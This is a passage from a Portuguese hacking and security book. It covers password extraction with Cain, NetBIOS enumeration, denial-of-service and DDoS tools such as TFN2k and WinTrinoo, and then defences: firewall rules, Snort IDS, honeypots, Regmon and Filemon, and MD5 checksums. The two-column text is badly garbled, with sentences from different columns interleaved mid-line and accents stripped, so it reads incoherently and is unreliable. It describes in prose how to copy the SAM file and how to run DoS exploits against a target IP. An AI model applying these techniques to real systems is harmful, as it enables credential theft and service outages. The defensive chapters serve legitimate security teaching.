para observar os mas o Cain faz isso com o toque de um boto. Aps j ter qualquer modificao que desejar. Uma outra opo
habilitado o seria utilizar um
224 atravs de comandos simples, como o nbtstat (status do <nome_do_computador> 4C U Servio TCP/IP DEC
sistema Linux que realize o boot pelo CD, como o Kurumin. Netbios), o invasor <nome_do_computador> 52 U Servio TCP/IP DEC
Assim, pode obter dados importantes, como os mostrados a <nome_do_computador> 87 U Exchange MTA
basta entrar na partio do Windows e copiar o arquivo seguir, identificando <nome_do_computador> 6A U Exchange IMC
criptografado servios essenciais no sistema e utilizando essas 226
de senhas, o SAM. informaes importantes <nome_do_computador> BE U Agente monitor da
LSA Secrets: Mesmo que um usurio no salve a sua para um possvel futuro ataque. rede
senha em Nome Nmero Tipo Uso <nome_do_computador> BF U Software monitor da
alguma conexo feita no Windows (como uma conexo <nome_do_computador> 00 U Servio de rede
de acesso ao workstation <usurio> 03 U Servio de
provedor de Internet, a chamada RAS), ela fica salva por <nome_do_computador> 01 U Servio de mensagens
um longo mensagens <domnio> 00 G Nome de domnio
tempo no LSA. Para obter esses dados s utilizar o <\\_MSBROWSE_> 01 G Browser principal <domain> 1B U Browser de domnio
Cain. Observe o <nome_do_computador> <domain> 1C G Controlador de
nome do usurio e a senha grifados: 03 U Servio de domnio
12.9 Netbios mensagens <domain> 1D U Browser principal
Como o captulo no somente sobre senhas, mas <nome_do_computador> <domain> 1E G Servios do browser
tambm sobre 06 U Servio de servidor <INet~Services> 1C G Internet Information
m-configurao, veremos um pouco agora sobre Netbios RAS Server
e recursos <nome_do_computador> 1F U Servio NetDDE <IS~Computer_name> 00 U Internet Information
compartilhados. Podem acontecer grandes problemas por <nome_do_computador> 20 U Servio de servidor de Server
coisas bobas, arquivos <nome_do_computador> [2B] U Servidor Lotus Notes
como compartilhamentos esquecidos ou Netbios por <nome_do_computador> IRISMULTICAST [2F] G Lotus Notes
TCP/IP ativado. 21 U Servio de cliente IRISNAMESERVER [33] G Lotus Notes
Antigamente, esse recurso no poderia ser acessvel pela RAS Forte_$ND800ZA [20] U Servio de gateway
Internet, mas, <nome_do_computador> 22 U Trocas de DCA
quando foi encapsulado, passou a ser um perigo e muitos intercomunicao Um outro problema ocorre com muitos usurios que usam
no ficam <nome_do_computador> 23 U Trocas de verses
suficientemente atentos para ele. armazenamentos mais antigas de sistemas, como o Windows 98. Como ele
225 <nome_do_computador> 24 U Diretrios do no possui
Nos Windows da famlia NT, os compartilhamentos C$, Exchange atualizaes automticas, como o XP e os mais novos,
ADMIN$ e <nome_do_computador> 30 U Servidor de muitas pessoas no
IPC$ so habilitados por padro. Isso permite que um compartilhamento de sabem como atualiz-lo e, nesses sistemas, voc no
invasor possa obter modem acessa recursos de
dados de sesso nula (como j vimos anteriormente) ou <nome_do_computador> 31 U Cliente de compartilhamento Netbios pelo nome de usurio e, sim,
utilizar recursos de compartilhamento de apenas colocando
fora-bruta para tentar descobrir a senha. De qualquer modem uma senha para cada recurso compartilhado. Uma das
maneira, o simples <nome_do_computador> 43 U Cliente remoto SMS piores falhas
fato de esses recursos estarem ativados j denuncia qual <nome_do_computador> 44 U Admin remoto SMS justamente em relao a essa senha. Ela pode ser
o sistema <nome_do_computador> 45 U Chat remoto SMS descoberta em poucos
operacional utilizado atravs dos processos de varredura <nome_do_computador> 46 U Transferncia remota segundos, independente se for fcil ou no. Isso fornece
e enumerao. E SMS uma falsa
sensao de segurana para os usurios (que pensam ter por a vai. Se possvel, acrescente entradas estticas na do sourceforge, vai encontrar dezenas de exploits que
seus documentos tabela ARP das causam justamente
protegidos), principalmente hoje, que a banda larga est mquinas do domnio (utilize um script simples para isso), isso. Por exemplo, o vrus Blaster explorava um bug no
se tornando evitando assim a servidor RPC do
extremamente comum. tcnica de ARP poisoning e, conseqentemente, o man in Windows 2000 e XP, que fazia com que o computador
Atravs de programas como o prprio Languard Network the middle. reiniciasse em poucos
Scanner No permita que os usurios locais consigam dar boot no segundos, como mostrado a seguir:
(www.gfi.com), podemos facilmente scannear um intervalo sistema por 229
de endereos disquete ou CD-ROM. Se isso acontecer, eles podero Esse processo de explorao quase igual a um exploit
IPs de um provedor de Internet e encontrar dezenas de facilmente resetar a comum.
compartilhamentos senha administrativa do sistema. E, por ltimo, no se Compile, coloque o endereo IP no qual a falha ser
prontos para serem acessados. Muitos deles ainda em esquea de remover explorada e, se o
sistemas antigos e quaisquer compartilhamentos de Netbios que no sistema estiver falho, a recusa de servio acontecer.
sem nenhuma senha. estiverem sendo 13.2 Ataques Comuns
12.10 Softwares utilizados. Lembre-se: cuidado nunca demais. Existem alguns tipos de ataques bem conhecidos no meio
12.10.1 Windows 228 digital, a
Brutus (http://packetstormsecurity.org) 13 Denial of Service maioria no mais eficaz, mas muitos ainda continuam
227 Estamos, agora, no ltimo ramo do organograma. Mas sendo largamente
Cain (www.oxid.it) observe que, usados. Curiosamente, alguns voltam a ser efetivos depois
Packet Sniffer (http://packetstormsecurity.org) nesse caso, ele no leva a um acesso no-autorizado. O de anos de
Achilles (http://packetstormsecurity.org) Denial of Service, ineficcia. Um exemplo o ataque Land, que era muito
NT CD (www.dmzs.com) ou recusa de servios, tem como objetivo derrubar um utilizado na poca
12.10.2 Linux sistema da rede, do Windows 95 e depois se tornou intil, at que uma
Ethereal (www.ethereal.org) consumindo os seus recursos. Isso pode ser feito de falha no Windows
DSniff (http://packetstormsecurity.org) diversas maneiras. Um 2003 permitiu que ele pudesse ser utilizado novamente.
AirSnort (www.airsnort.org) exemplo simples: um invasor poderia enviar um pacote Alguns dos
Paros Proxy (www.parosproxy.org) spoofado para o inmeros tipos de ataques comuns de recusa de servio:
12.11 Soluo servidor echo de uma rede, como se tivesse vindo do 230
Configure corretamente o seu sistema. Esteja atento para servidor chargen, Ping da morte: Tcnica muito antiga e totalmente
configuraes de senhas, force os usurios a utilizarem fazendo os dois trocarem informaes entre si, consumindo ineficaz, mas vale
senhas com, no toda a banda como referncia histrica. Tratava-se de enviar um ping
mnimo, oito caracteres e misturando letras e nmeros. disponvel. Vamos dividir os ataques de recusa de servio para um site,
Faa com que o por tipos: os que com um pacote muito grande, fazendo esse sistema
sistema pea a troca dessa senha em, no mximo, a cada exploram falhas, os simples que consomem os recursos da travar.
trs meses (o rede e os que Syn Flood: Tcnica que envia pacotes Syn para um
ideal um). Tambm bloqueie a conta do usurio aps utilizam softwares zumbis. sistema, mas no
trs tentativas 13.1 DoS atravs de Falhas realiza a transao completa em trs vias. O resultado
invlidas para evitar os ataques de fora-bruta. Uma das maneiras de se causar uma recusa de servio que o alvo
Utilize servios criptografados na rede para evitar o se vai recebendo inmeros pacotes, fica aguardando o resto
sniffing aproveitar de falhas em um sistema. Se voc pesquisar no das
(farejamento). Prefira SSH em vez de Telnet, SFTP em vez banco de dados respostas e, eventualmente, consome todos os seus
de FTP comum e recursos.
Smurf: Tcnica que utiliza os endereos de broadcast TFN2k (http://packetstormsecurity.org) maiores problemas. Se voc seguir com cuidado essas
das redes para 13.5 Soluo recomendaes, vai
gerar trfego excessivo e redirecionar todos esses dados No existe uma soluo definitiva para o problema do evitar muita dor de cabea.
em um nico Denial of Coloque senha na Bios do sistema. Isso vai evitar que
alvo, consumindo automaticamente a sua banda. Service. Se um DDoS for feito contra voc, no haver algum
Existem diversos outros tipos de ataque, mas o problema muita ao que possa modificar o seu sistema para fazer com que dem
dessas possa ser tomada. Mas contra os ataques comuns e as boot
tcnicas que hoje elas so ineficazes contra um sistema falhas, esses sim, pelo CD-ROM, por exemplo.
com conexo 231 Evite deixar post-its ou recados com informaes
dedicada de altssima velocidade, como um T1 ou T3. De voc pode dar um jeito. Primeiro esteja sempre corrigindo importantes
que adianta eu possveis bugs como senhas perto do seu computador.
tentar um Syn-flood com a minha conexo de banda do sistema. Depois, configure de modo minucioso como a No utilize uma senha de acesso fcil.
larga de 512 kb contra pilha do TCP/IP Instale um bom antivrus e esteja sempre atualizando. Se
um host que possui um link de mais de 10 Mb? Como os vai se comportar em determinadas situaes. Por possvel, instale dois. Assim, a chance de algo escapar
atacantes exemplo: voc pode da
conseguem ento derrubar essas conexes? Da mesma configurar o sistema para parar de responder a um proteo menor.
maneira que o vrus determinado IP se ele Verifique as permisses de usurios, arquivos e pastas
MyDoom fez para realizar uma recusa de servio no site receber desse endereo dez pacotes Syn em seqncia e do
da SCO, a criadora nenhuma outra sistema. Permisses mal configuradas podem permitir
do Linux. Utilizando um DDoS, Distributed Denial of resposta. Isso evitaria o ataque de Syn Flood. facilmente que um invasor consiga escalao de
Service. Encerramos aqui a parte de Penetration Test. Agora, privilgios.
13.3 DDoS veremos um pouco No faa downloads de programas em sites pouco
Quando o ataque comum e as falhas no adiantam, sobre a segurana em si. confiveis.
hora de recorrer 232 Verifique os arquivos de inicializao do sistema para
aos softwares zumbis para realizar essa tarefa. A recusa 14 Segurana ver se no
de servio Estar seguro uma necessidade nos dias de hoje. Seja h nenhum servio ou software estranho sendo
distribuda um poderoso recurso, pois soma todo o segurana inicializado.
poder das conexes fsica, material ou digital. Especialmente a digital, pois Alm dessas dicas, importante termos algumas
nos sistemas em que est instalada. Se eu infectar cem hoje dependemos ferramentas para
computadores, dos computadores e da Internet para diversas coisas, nos auxiliar. Veremos algumas que so essenciais de se
cada um deles possuindo uma conexo de at 256 Kb, j como consultar a ter no sistema.
o suficiente para Receita, acessar um banco etc. Vimos como os invasores 14.2 Firewall
derrubar grandes servidores. Existem alguns programas conseguem obter Ferramenta indispensvel em qualquer sistema, um
para realizar isso, nossos dados, invadir nossos sistemas e capturar nossas firewall uma
o mais conhecido deles o Tribal Flood Network, ou TFN. senhas. Agora, proteo importante. Seja composto de software ou
Esse software vamos entender melhor sobre como nos protegermos. hardware, firewall
possui diversas verses, como o TFN2k. Tambm existem 14.1 Dicas Bsicas 233
alguns poucos Algumas dicas simples de como tornar o seu ambiente pessoal ou uma soluo completa de ACLs (Controle de
programas para Windows que realizam essa tarefa. O mais seguro. Listas de Acesso),
mais conhecido deles Isso importante, pois so nas pequenas coisas que essencial e imprescindvel voc possuir um para sua casa
o WinTrinoo. acabamos tendo os ou empresa. O
13.4 Software
muro de fogo permite que voc controle quais os acessar. De dentro para fora a mesma coisa. 235
endereos IPs podero E o ICMP? Bloquear ele de fora para dentro d at para Em Settings, voc tem a opo Packet filter, que
acessar o seu sistema, que servios podero ser acessados entender, pois justamente o
da Internet, ningum encontrar o servidor atravs de ping, nosso muro de fogo. D uma olhada nela. Essa opo
impedir ICMP de entrada (muito importante, j que o ping dificultando a enumerao permite que voc
o primeiro de hosts ativos. Mas de dentro para fora? Sim. Algumas veja todas as regras de firewall que j foram criadas e
passo geralmente feito pelos invasores durante os ferramentas de estabelecidas para
processos de footprinting conexo reversa utilizam esse recurso para checar se seus cada um dos adaptadores do sistema. As regras
e varredura), bloquear varreduras de portas e muito sistemas mostradas esto definidas
outros recursos. receptores esto ativos e, ainda, existem alguns como Incoming (entrada) e Outgoing (sada). Inclusive,
Isso tudo porque foi mencionada apenas a proteo de backdoors que se com ele, voc
fora para comunicam somente atravs desse protocolo. Ento, se consegue criar regras at para conexes discadas.
dentro, mas os firewalls tambm fazem uma excelente no for precisar 236
proteo de dentro utilizar ICMP de sada, bloqueie pelo menos o ICMP Para definir uma nova regra, escolha o adaptador no
para fora. Voc pode impedir que algum usurio da rede ECHO REQUEST (o qual deseja criar
interna se conecte ping). o recurso. Depois, clique no boto ADD. Voc vai ter um
a um servidor Telnet externo, Netbios ou mesmo FTP. Existem excelentes solues de firewall para sistemas menu completo
Algumas sugestes Windows e para definio de regras. Qual protocolo utilizar, a
de bloqueio: Linux/Unix. Particularmente, um que eu gosto bastante o porta, endereos IPs
Fora para dentro Dentro para fora Kerio Winroute. permitidos (inclusive permitindo que voc use intervalos ao
21 FTP 21 - FTP Vou mostrar um pequeno tutorial dele. Para comear, ele invs de
22 - SSH 22 - SSH no apenas um endereos simples), se vai permitir ou negar a conexo,
23 - Telnet 23 - Telnet filtro de pacotes. Tambm realiza NAT, tem servidores tempo de
Portas acima do nmero 120 Portas acima do nmero DHCP e de correio, expirao, se vai logar as tentativas de acesso em um
120 entre diversos outros recursos (at anti-spoofing). arquivo ou vai
ICMP de entrada (ping, 234 apenas mostrar na tela, enfim, tudo o que um bom
traceroute) Ao instalar o Winroute, um cone fica na bandeja do firewall oferece de
ICMP de sada (ping, traceroute) sistema. Atravs desse opes.
Claro que existem excees. Por exemplo, voc pode cone, voc poder se conectar ao firewall. Um recurso Para o sistema Linux, recomendo o tambm excelente
liberar o acesso interessante dele a IPtables, sucessor do
de fora para dentro para o SSH, que um servio utilizao de sistema de servidor, ou seja, tendo um IPchains. Permite os mesmos recursos que o winroute, com
seguro. Mas recomendase usurio e uma senha fcil
que voc especifique o intervalo de endereos IPs que criados, podemos nos conectar remotamente a ele para configurao e utilizao de scripts.
podem se realizar novas Um firewall realmente uma ferramenta importantssima,
conectar a esse servio, evitando, assim, que algum configuraes. mas de
descubra a porta em Aps entrar corretamente com os dados, a tela principal nada adianta quando os ataques so realizados em
alguma varredura e tente explorar uma falha. J se voc do sistema portas permitidas.
necessitar da ficar disponvel. A interface muito amigvel e intuitiva, Exemplo: ningum costuma barrar o acesso de fora para
liberao de algum servio acima da porta 120, tente permitindo que dentro na porta
agir da mesma voc localize rapidamente alguns recursos importantes 80, servidor Web da empresa ou instituio. Como ento
maneira, especificando aqueles endereos que tero que o programa detectar ataques
permisso para possui.
de SQL injection ou identificao de vulnerabilidades sniffer. seguras, pois no utilizam servios reais. Nas honeynets h
atravs de strings? 238 o risco de
Isso trabalho para o IDS. Existe um outro recurso que pode ser utilizado para um atacante conseguir acesso de baixo nvel no sistema e
14.3 IDS identificar utilizar a
237 intrusos. algo no to conhecido da comunidade de mquina como ponte para outros ataques.
Um IDS, ou sistema de deteco de intrusos, nada mais segurana em geral e No existem muitos softwares honeypots disponveis hoje.
do que um menos ainda utilizado. Eu venho h
sniffer. Age da mesma maneira que todos os farejadores, 14.4 Honeypots alguns anos desenvolvendo um, totalmente em portugus,
capturando todo o O pote de mel uma das mais controversas solues denominado de
trfego que existe em uma rede. A grande diferena existentes, Valhala Honeypot. bem simples de se usar e simula
que o IDS possui mas ainda uma opo muito til. Um honeypot uma diversos tipos de
regras bem estabelecidas que procuram, nesses pacotes, ferramenta ou servidores conhecidos. Vou dar uma rpida demonstrao
se algum ataque sistema criado com objetivo de enganar um atacante e de como o
est acontecendo. Por exemplo, ao analisar pacotes faz-lo pensar que programa funciona.
provenientes do conseguiu invadir o sistema, quando, na realidade, ele 239
servidor Web, ele pode detectar se alguma string est em um Na figura anterior, voc v a tela principal do Valhala.
maliciosa foi digitada por ambiente simulado, tendo todos os seus passos logados. Ela est
algum invasor que est tentando identificar falhas. Se o Dependendo da simulando uma sesso de Telnet e mostrando um shell de
atacante digitar situao, essa ferramenta pode ser mais til at do que comandos falsos
www.site.com.br/php, o sniffer ir capturar essa um sistema de para o invasor. Perceba que cada um dos comandos
informao e mostrar deteco de intrusos. Existem diversos projetos de potes digitado pelo invasor
como um possvel problema de segurana. de mel na foi capturado: dir, cd, type etc. O programa fornece a
justamente esse o ponto fraco e o forte do IDS ao Internet, o mais conhecido dele o HoneyD. Podemos hora da tentativa, o
mesmo tempo. dividir os honeypots endereo IP do ataque e tenta descobrir o nome de
Ele consegue identificar at mesmo shellcodes de exploits em dois tipos: domnio da mquina (no
sendo Honeynets: Redes fsicas nas quais cada computador caso do exemplo, o nome Kurumin). Os botes do
executados, mas, ao mesmo tempo, fornece muitos falso- considerado programa so: Monitor,
positivos. Mesmo um honeypot. Geralmente, possuem servios reais para deixar o programa funcionando; Parar, para
assim, ainda algo vital de se ter em uma rede para instalados interromper o
evitar complicaes. (servidor Web e outros) normalmente bugados para funcionamento; Limpar, para limpar os logs na tela;
Existem diversos softwares que realizam essa tarefa. Dois que o invasor Salvar, para salvar
gratuitos se possa se utilizar deles para ganhar acesso mquina. esses logs; Opes, para mostrar tipos de configuraes
destacam: o Nuzzler, da CheckPoint, e o excelente e Essa categoria diversas, como
opensource Snort. de potes de mel mais utilizada para estudos em envio de logs e portas extras a serem monitoradas;
Na figura anterior, voc v o Snort rodando e capturando ambientes Honeypot, que a
pacotes na acadmicos. configurao dos servidores em si. Vamos dar uma
rede. Ele pode ser facilmente atualizado atravs do seu Honeypots em Software: So programas criados com o olhadinha melhor nessa
site. Lembre-se: o intuito de opo.
mais importante do IDS estar sempre com as regras simular diversos servidores (Web, Telnet, FTP etc.) para 240
novinhas, pois que os Nas configuraes de Honeypot, voc pode escolher os
ataques aparecem todos os dias. Sem isso, ele no passa invasores possam ser enganados. So solues mais servidores
de um simples prticas e mais
falsos que sero simulados, a porta em que ir rodar, o acessados. Normalmente um processo chato, a menos retalhar antes de jogar no lixo para que ningum consiga
diretrio, banners que voc utilize recuper-lo
mostrados na conexo, nomes de usurios e senhas a programas especficos para isso. depois? Pois , s vezes, no computador, voc precisa
serem descobertos. 242 fazer a mesma coisa.
Ainda existem algumas opes interessantes, como o 14.5.1 Monitorador de Registro Existem softwares que conseguem recuperar at duas, trs
arquivo armadilha do Com o regmon, voc consegue ver em tempo real o que formataes
servidor FTP (um arquivo que poder ser baixado pelo suas passadas em um sistema. Isso significa que no adianta
invasor, se aplicaes esto fazendo no registro do sistema, alm do mais voc apagar
permitido). O programa vai mais alm. Voc pode, se tipo de ao que normalmente um arquivo, ele poderia ser facilmente
desejar, fazer uma est sendo realizada: OpenKey (abertura de chave), recuperado.
configurao avanada em alguns dos servidores, para CloseKey (fechamento 244
personalizar ao de chave), QueryValue (leitura de valor). Veja quantas Outro problema seriam todos os rastros que o Windows
mximo o seu falso sistema. Veja, a seguir, a chaves o MSN abriu deixa quando
configurao personalizada em pouco tempo. Se tiver algum malware no sistema e ele voc trabalha nele: ltimos documentos acessados, ltimas
do servidor Telnet. estiver msicas
241 realizando consultas freqentes no registro, voc ouvidas, ltimas pginas digitadas, arquivos temporrios
Nessa configurao de Telnet, voc pode definir conseguir rapidamente no cache e muitas
absolutamente tudo: visualizar. outras coisas. Imagine a situao: voc apaga esses
espao livre em disco, nome dos diretrios, qual diretrio 243 dados, seus
ser acessvel, 14.5.2 Monitorador de Arquivos documentos importantes, achando que no h como serem
endereo MAC e informaes de rede que sero O FileMon tem a interface idntica ao Regmon, mas, ao recuperados. De
mostradas no comando contrrio do repente, algum rouba o seu notebook e consegue
ipconfig, quantos comandos o invasor poder digitar outro, ele monitora a utilizao de arquivos - quais recuperar essas
antes de ser arquivos esto sendo informaes vitais. Por isso mesmo, vou apresentar uma
desconectado, a possibilidade de vincular arquivos falsos abertos, fechados, que diretrios os programas esto soluo para voc
com verdadeiros acessando. um se livrar de todos os tipos de rastros de uma s vez: o
etc. Assim, quando o atacante tentar visualizar um recurso importante para a segurana, j que permite que Evidence Eliminator.
arquivo, vai ver o voc encontre 14.7 Checksums
contedo verdadeiro, fazendo com que a farsa seja mais aplicaes maliciosas que estejam injetadas onde no Uma maneira eficiente de voc identificar se um arquivo
convincente. deveriam, ou mesmo realmente
Existem diversas outras opes e estou sempre arquivos executveis suspeitos. quem deveria ser e no uma verso hackeada, como no
desenvolvendo novidades O ideal deixar o regmon e o filemon rodando durante caso de um
para o programa. O melhor de tudo? Ele gratuito. um tempo e rootkit, utilizar o recurso do checksum MD5. Um hash
14.5 Monitoradores do Sistema depois fazer uma anlise dos logs. Se quiser, ambos tm criptografado
Quando voc est desconfiado que existe um backdoor, a opo de filtrar gerado para cada arquivo que voc pedir, assim,
trojan ou os dados. Voc pode incluir todas as aplicaes e excluir qualquer alterao nele,
rootkit no seu sistema e ele est injetado em alguma algumas, ou por mnima que seja, vai fazer com que um outro hash
aplicao ou excluir todas e incluir apenas as que voc desejar. completamente
simplesmente ocultando sua porta, voc pode tentar 14.6 Limpeza de Rastros diferente seja gerado. importante ento voc ter um
descobrir esse Sabe aquele documento importante, confidencial, que pequeno banco de
malware monitorando o registro do sistema e os arquivos voc manda dados desses checksums, feitos principalmente logo que o
que esto sendo sistema
operacional for instalado. Isso porque, nessa situao, os
executveis esto
frescos (livres de vrus e malwares) e voc poder
utilizar essa lista de
hashes para futura comparao, caso desconfie que
algum dos seus
programas foi comprometido.
Muitos programas realizam isso, entre eles o
WxWindows.
245
14.8 Softwares
14.8.1 Windows
Winroute (www.kerio.com)
Nuzzler (www.checkpoint.com)
Snort (www.snort.org)
Valhala Honeypot
(www.sourceforge.net/projects/valhalahoneypot)
Valhala Honeypot 2# (www.defhack.com)
Regmon (www.sysinternals.com)
Filemon (www.sysinternals.com)
Evidence Eliminator (www.superdownloads.com.br)
14.8.2 Linux
Iptables (http://packetstormsecurity.org)
Snort (www.snort.org)

Você também pode gostar